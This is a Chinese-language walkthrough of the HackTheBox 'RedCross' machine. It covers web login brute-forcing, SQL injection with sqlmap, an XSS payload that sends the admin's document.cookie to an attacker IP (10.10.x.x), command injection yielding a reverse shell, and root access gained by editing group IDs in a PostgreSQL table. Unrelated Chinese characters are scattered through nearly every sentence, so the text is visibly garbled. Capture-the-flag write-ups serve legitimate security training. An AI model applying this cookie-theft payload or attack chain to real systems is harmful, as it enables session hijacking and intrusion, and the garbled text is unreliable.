1.nmap探測(cè)發(fā)現(xiàn)22想诅、80翘单、443闷堡、端口開放说敏。瀏覽器連接80端口會(huì)重定向到域名https://intra.redcross.htb/苍姜,將域名添加到/etc/hosts后可以看到網(wǎng)頁(yè)鲁僚。
2.暴力破解web登錄頁(yè)面,可以拿到一對(duì)登錄憑據(jù)guest:guest容达,提交表單中的UserID古涧,可以獲取一個(gè)能夠注入的url。
弱點(diǎn)url
3.sqlmap對(duì)url進(jìn)行注入花盐,可以從redcross數(shù)據(jù)庫(kù)中拿到部分hash和提示羡滑,其中反復(fù)提到admin webapp菇爪,說(shuō)明存在一處管理面板,subd說(shuō)明是子域名柒昏。
redcrosss數(shù)據(jù)庫(kù)
4.再次添加/etc/hosts/對(duì)應(yīng)關(guān)系凳宙,10.10.10.113 <----> admin.redcross.htb,可以看到管理員界面职祷,但是沒有登錄密碼氏涩。
管理員界面
5.回到intra.redcross.htb,在contact頁(yè)面發(fā)現(xiàn)留言板有梆,會(huì)向后臺(tái)提交數(shù)據(jù)是尖,可能存在XSS,在email表單項(xiàng)中確認(rèn)存在XSS泥耀,編寫script腳本(<script>new Image().src='http://10.10.x.x/'+document.cookie</scr)饺汹,并在本地監(jiān)聽回連,可以拿到管理員cookie痰催。
cookie
6.登錄后可以看到如下界面兜辞。
后臺(tái)界面
7.在防火墻面板上添加自己的ip。
防火墻
8.在用戶管理頁(yè)面可以添加用戶夸溶,系統(tǒng)會(huì)自動(dòng)生成密碼逸吵,該密碼可以登錄ssh,但獲得的是受限shell并沒有什么用蜘醋。
添加用戶
9.回到防火墻管理頁(yè)面胁塞,在deny按鈕發(fā)包處發(fā)現(xiàn)存在命令注入漏洞咏尝,可以直接拿到反彈shell压语。
反彈shell
10.在shell中翻看頁(yè)面信息,可以拿到多個(gè)數(shù)據(jù)庫(kù)連接串编检,包括mysql和psql胎食。
db pass
11.登錄psql發(fā)現(xiàn),有四個(gè)表單允懂,只有passwd_table表有訪問(wèn)權(quán)限厕怜,但這個(gè)表中保存了你剛在通過(guò)用戶管理頁(yè)面添加的用戶帳戶,gid蕾总,uid粥航,group纺裁,帳戶目錄等關(guān)鍵信息愤兵。嘗試update gid=0,group=0悲雳,目錄為/root發(fā)現(xiàn)可以成功蚀浆。登錄后你能拿到相應(yīng)權(quán)限但是無(wú)法sudo缀程,應(yīng)為你不在sudo組中搜吧。
更新權(quán)限
12.查看/etc/group發(fā)現(xiàn)sudo組id為27,再次更新用戶gid為27杨凑,可以正常sudo命令權(quán)限為all滤奈,至此順利拿下目標(biāo)。
